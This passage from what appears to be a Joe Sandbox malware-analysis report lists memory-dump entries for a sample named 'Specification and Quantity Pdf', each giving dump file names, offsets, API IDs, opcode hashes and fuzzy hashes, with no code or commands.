            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CounterPerformanceQuery
            • String ID:
            • API String ID: 2783962273-3916222277
            • Opcode ID: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
            • Instruction ID: c35842e7f484654b3ac334df4528a6549c752559b4e390cd7d762a1eb587cc3a
            • Opcode Fuzzy Hash: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
            • Instruction Fuzzy Hash: A6D1C373A38A9682EA90AB65E440279B395FB41BA4F944332DE6D677D0DF3CE051C320
            APIs
            • GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF773CE90F0
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
            • Instruction ID: cbc1feffcd044cd58f4aaa998579ddecdb09d640e1e9336f4bbbfe78b7dbfb68
            • Opcode Fuzzy Hash: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
            • Instruction Fuzzy Hash: AC012A33F246609DF761EBA5EC40AED77B5BB48358FA0412ADE0CA6A49DF349496C700
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: %_
            • API String ID: 0-4145416222
            • Opcode ID: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
            • Instruction ID: ac25eb94a0ba39906624a36420b85d32b0d285fe17edf03c3c3b455010eb03c0
            • Opcode Fuzzy Hash: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
            • Instruction Fuzzy Hash: B941F763F3CB0AC1ED85A7B6AA41634E1525F5A7D0EA8C732D85E377D1EF2D71904220
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
            • Instruction ID: 8ea7643807d3e8fa193684662e4e35cab19610ab380040e7973cd9a3852250b3
            • Opcode Fuzzy Hash: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
            • Instruction Fuzzy Hash: 6282EFB3B2878587EBA49B15E1402B9B7A1FB94780F648136DB4E53B84DF3DE960C740
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
            • Instruction ID: d6efedd3c51aaabbf9bdcaddcd34d8c0fa9af55bdf03cf0d49a4047f7ad933a7
            • Opcode Fuzzy Hash: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
            • Instruction Fuzzy Hash: 1B92F063E3CB5285EA81ABA5A8506B4F395BF45BC4FC48236D90E777A0DF3DE1518320
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
            • Instruction ID: 564a92b90865708bdb77994d74d6e82f55c747812fcc81412014e864e42ef45b
            • Opcode Fuzzy Hash: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
            • Instruction Fuzzy Hash: 4782BB63A3CA4285EBD0AB65A4402B9B3A5FF45788F944236C94E233E0DF3DE565C360
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
            • Instruction ID: a73cd6657c20e3690908087baab83148077c25062d9e54672bcb33d29b778eda
            • Opcode Fuzzy Hash: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
            • Instruction Fuzzy Hash: 8E82CA33B38B8186EB90AB65E8402B9B7A1FB44B98F944136DE4D63B94DF3CE551C710
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bf5feb339442a0b79f58c974cad3d97fda4eb93d98ba6868e8e29d5f65b0f64f
            • Instruction ID: afe144e48cc4c426e1e5d31716f19da662e7381aab868070fc433f5184f99f1e
            • Opcode Fuzzy Hash: bf5feb339442a0b79f58c974cad3d97fda4eb93d98ba6868e8e29d5f65b0f64f
            • Instruction Fuzzy Hash: BB5250E3A39B9A81EEA59B19C044378A7A0FF15BA5F985235CF6C233D4DF6CD490C210
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
            • Instruction ID: 60d7930f0e6ebc9a40d7533493f762fac02d880c36537819671e33b94b0656dd
            • Opcode Fuzzy Hash: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
            • Instruction Fuzzy Hash: 7742BBB3B38B4686EB909B65E4401ADB7A1FB44B98F840532DF4E27B98CE7CE551C710
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
            • Instruction ID: e8f7660bfc12e4b6c39d505f2ca2f38442ca1dbd8070888c792889e901caebe5
            • Opcode Fuzzy Hash: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
            • Instruction Fuzzy Hash: C042AE73B3874586EB90DBA5D5002ECB3A2AB45B88F844536DE0D37B88CF38E565C364
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 456757d216aacf14f41c1d1ac0cd8049a835610a21c3933073f91090c7e01898
            • Instruction ID: 5bccf5689972a5402d231c1d0c4e17dfdcb5b9ccec698b6b71f93462a7e17a9e
            • Opcode Fuzzy Hash: 456757d216aacf14f41c1d1ac0cd8049a835610a21c3933073f91090c7e01898
            • Instruction Fuzzy Hash: DD42B573B38B8982DA90EF49E4402A9B7A1FB41BD0F859136DA8D67798DF3CD155C310
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
            • Instruction ID: 470920c5859069642522859005785bd6ca53b8ea2e915d9663fb56f572f95bc8
            • Opcode Fuzzy Hash: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
            • Instruction Fuzzy Hash: 1A221523A39FC945E687A7399411375E395AF563C1F988332ED4F327A1EF3EA1528210
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e10a91a420f83ef269157d36f9a2c016ddaa9393997882352c17c1d84d133b48
            • Instruction ID: cc0ae2fd5fd2a2fadb1285e989a351e715797d3982c2c4e4043937db16d10ee4
            • Opcode Fuzzy Hash: e10a91a420f83ef269157d36f9a2c016ddaa9393997882352c17c1d84d133b48
            • Instruction Fuzzy Hash: 24029D73B28A558AEB50DF65D880AAC7770FB88B98F909132DE4D63B95CF34D981C740
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CounterPerformanceQuery
            • String ID:
            • API String ID: 2783962273-0
            • Opcode ID: af019d92b74d7be67137a52f9c77fda3c993f8b49f31bc8590fea9e3453cb08d
            • Instruction ID: 4f0ae79af0b13b363ba2676b7750648b3fbe0baede83a19c1e64eb263c968b4b
            • Opcode Fuzzy Hash: af019d92b74d7be67137a52f9c77fda3c993f8b49f31bc8590fea9e3453cb08d
            • Instruction Fuzzy Hash: FA02E463B39A4686EA90AF55E4403F9B7A0EF45BA4F848236D92E673D4DF3CE151C310
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b68f8225f78dbd7e70b131091e98211d99f4f2d9e2b5582c38477461e06b5bdc
            • Instruction ID: a962ce0d36d9977708741bec42de20c8a780105f2652b6d6ce60c8f5fb4bbbde
            • Opcode Fuzzy Hash: b68f8225f78dbd7e70b131091e98211d99f4f2d9e2b5582c38477461e06b5bdc
            • Instruction Fuzzy Hash: 7302B073A38A5686FA94EF55D8406B8B760EB40BA5F848232DE6D673D0CF3CE451C321
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 755864b5fa2e0ffc51d8cb0fddda48fb3472de9c38ab859b6004a688e4e9f16c
            • Instruction ID: 0f1c5d9e96eaf577c2825e32eb321d0b579f14566c6f96928b34d46e2ef28a11
            • Opcode Fuzzy Hash: 755864b5fa2e0ffc51d8cb0fddda48fb3472de9c38ab859b6004a688e4e9f16c
            • Instruction Fuzzy Hash: 64F10B13E3975D41E992A67752023B5D6916F6A7C1E9CCB32EE4E367D0EF3CB0918220
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 323b4a52389b31af78a198108c136ecd75e8293e50210e2468e6e8b2983b1f89
            • Instruction ID: e0590e9904bc09772f453c66573d7e944a9d1f6878f386f96923f1fcd3d1227a
            • Opcode Fuzzy Hash: 323b4a52389b31af78a198108c136ecd75e8293e50210e2468e6e8b2983b1f89
            • Instruction Fuzzy Hash: 26E10273A3864286EB91AB65D4486B9B3A1FF45B94F944232C91E637D0DF3CE591C320
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d78bf327fc7d401db98ee101711161cfb4b90b568116cb42030e1b04918fb35b
            • Instruction ID: 1847b4a3f5220322ead7c922541a36b9e5435187f73920e01a5f5b2b63aec7e4
